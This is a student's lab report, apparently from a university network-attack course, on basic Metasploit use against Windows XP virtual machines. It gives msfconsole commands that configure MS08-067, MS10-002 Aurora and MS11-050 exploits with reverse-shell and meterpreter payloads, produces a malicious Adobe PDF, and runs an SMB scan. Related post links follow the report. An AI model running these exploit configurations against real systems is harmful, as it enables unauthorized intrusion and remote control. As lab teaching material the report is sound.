20155330 《网络对抗》 Exp5 MSF基础应用

实践过程记录

主动攻击实践:MS08_067漏洞攻击

  • 攻击机:kali

    • IP地址:192.168.124.132
  • 靶机:windows XP SP3 简体中文
    • IP地址:192.168.124.135
  • 输入命令use exploit/windows/smb/ms08_067_netapi
  • 设置参数
set payload generic/shell_reverse_tcptcp反向回连
set LHOST 192.168.124.132
set LPORT 5330 端口
set RHOST 192.168.124.135
set target 0
  • 并进行攻击exploit

  • 结果失败了。

  • 然后重新换了一台靶机windows XP SP3(English),重设了攻击目标地址。

  • 成功了,使用systeminfo查看靶机信息。

针对浏览器攻击:MS11-050漏洞攻击

  • 攻击机:kali

    • IP地址:192.168.124.132
  • 靶机:Windows XP Professional SP3 简体中文
    • IP地址:192.168.124.135
  • use windows/browser/ms11_050_mshtml_cobjectelement使用该模块
  • 加载payloadset payload windows/meterpreter/reverese_http,并设置相应参数,打开服务exploit,发起渗透攻击。

  • 在靶机中启动IE 7浏览器,访问链接:http://192.168.124.132:8080/ms5330

  • 但是在kali攻击机中一直出错,回连没有成功。
  • 然后参考组长的博客,将攻击的目标漏洞换成了MS10_002_aurora

针对浏览器攻击:MS10_002_aurora漏洞攻击

  • 攻击机:kali

    • IP地址:192.168.124.129
  • 靶机:Windows XP Professional SP3(English)
    • IP地址:192.168.124.136
  • 输入下图中的命令并执行攻击

  • 在靶机中启动IE 7浏览器,访问链接:http://192.168.124.132:8080/aurora.html

  • 本来是回连成功的,但是输入错了命令,然后只好重做了一遍。

  • 第二次生成了不同的网址

  • 回连成功后使用sysinfo查看靶机信息

  • 靶机ip地址

针对客户端的攻击:Adobe渗透测试

  • 攻击机:kali

    • IP地址:192.168.124.129
  • 靶机:Windows XP Professional SP3 简体中文
    • IP地址:192.168.124.135
  • 进入windows/fileformat/adobe_cooltype_sing模块设定相关系数并生成相关文件5330.pdf

  • 将生成的pdf文件导入到靶机中运行,回连成功!可对靶机进行操作。

  • 在靶机中关闭PDF文档后,攻击机与靶机断开连接。

辅助模块

  • 输入命令show auxiliary查看所有辅助模块

  • 选中其中一个模块进入。该模块是用于对smb的版本进行扫描,SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。。

  • 设置必要参数,并使用show options查看需要设置的消息

  • 使用命令run开启扫描,结果如下:

实验后回答问题

  • exploit

    • 攻击。简单来说就是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击。主要分为主动攻击和被动攻击。
  • payload

    • 攻击载荷。类似shellcode,在攻击渗透成功后对被感染计算机进行后门操作,达到攻击效果。
  • encode

    • 编码器。修改字符达到“免杀”目的。

实验感受

这次实验主要对Windows xp系统及其有关应用中的部分漏洞进行了攻击,从而也感受到了msf工具功能的强大。

20155330 《网络对抗》 Exp5 MSF基础应用的更多相关文章

  1. 2018-2019 20165237网络对抗 Exp5 MSF基础应用

    2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...

  2. 2018-2019 20165221 网络对抗 Exp5 MSF基础

    2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...

  3. 2018-2019 20165235 网络对抗 Exp5 MSF基础

    2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...

  4. 2018-2019 20165220 网络对抗 Exp5 MSF基础

    实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...

  5. 2018-2019 20165219 网络对抗 Exp5 MSF基础

    实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...

  6. 20145338 《网络对抗》 MSF基础应用

    20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...

  7. 20145308 《网络对抗》 MSF基础应用 学习总结

    20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...

  8. 20145326蔡馨熤《网络对抗》——MSF基础应用

    20145326蔡馨熤<网络对抗>——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机 ...

  9. 20155218《网络对抗》MSF基础应用

    20155218<网络对抗>MSF基础应用 实验过程 1.一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞: show target 查看可以 ...

  10. 20155304《网络对抗》MSF基础应用

    20155304<网络对抗>MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_ ...

随机推荐

  1. SQLServer 学习笔记之超详细基础SQL语句 Part 10

    Sqlserver 学习笔记 by:授客 QQ:1033553122 -----------------------接Part 9------------------- 删除约束的语法 ALTER T ...

  2. m6c2g核心板使用笔记

    周立功官网资料下载链接:http://www.zlg.cn/ipc/down/down/id/84.html 平台:致远M6G2C-L Cortex-A7工控核心板 主要参考文档:EPC_loT_M6 ...

  3. C语言中数据类型的本质

    数据类型可以理解为固定内存大小的别名.比如int类型,就是表示占用4字节的内存. 1 数据类型的大小 用sizeof操作符获得数据类型的大小. 比如 int a[5];   sizeof(a)就可以得 ...

  4. Java的8种基本数据类型和3种引用数据类型

    背景 最近被一个问题难倒:问到Java的基本数据类型有8种,具体是哪几个?一起复习下: Java数据类型概述 变量就是申请内存来存储值,即当创建变量的时候,需要在内存中申请空间. 内存管理系统根据变量 ...

  5. mysql Alter table设置default的问题,是bug么?

    不用不知道,用了没用? 昨天在线上创建了一个表,其中有两个列是timestamp类型的,创建语句假设是这样的: create table timetest(id int, createtime tim ...

  6. SQL Server数据库中外键强制约束的好处是什么,什么时候设置外键非强制约束?(转载)

    Sql Server: What is the benefit of using “Enforce foreign key constraint” when it's set to “NO”? 问 I ...

  7. 转:SQL 关于apply的两种形式cross apply 和 outer apply

    原文地址:http://www.cnblogs.com/Leo_wl/archive/2013/04/02/2997012.html SQL 关于apply的两种形式cross apply 和 out ...

  8. postgresql排序分页时数据重复问题

    当同时排序又分页时,如果排序的字段X不是唯一字段,当多个记录的X字段有同一个值时顺序是随机的. 这个有可能造成分页时数据重复的问题.某一页又把上一页的数据查出来了,其实数据库只有一条记录. 解决办法: ...

  9. 内网arp攻击

    内网arp攻击 环境:一台kali虚拟机(攻击者),一台win7虚拟机(用户) 网络:NAT模式 网段:192.168.41.0/24 网关:192.168.41.2/24 win7的IP地址:192 ...

  10. dns服务器测试工具

    下载地址:https://www.eatm.app/wp-content/uploads/2018/08/eDnsTest.20180810.zip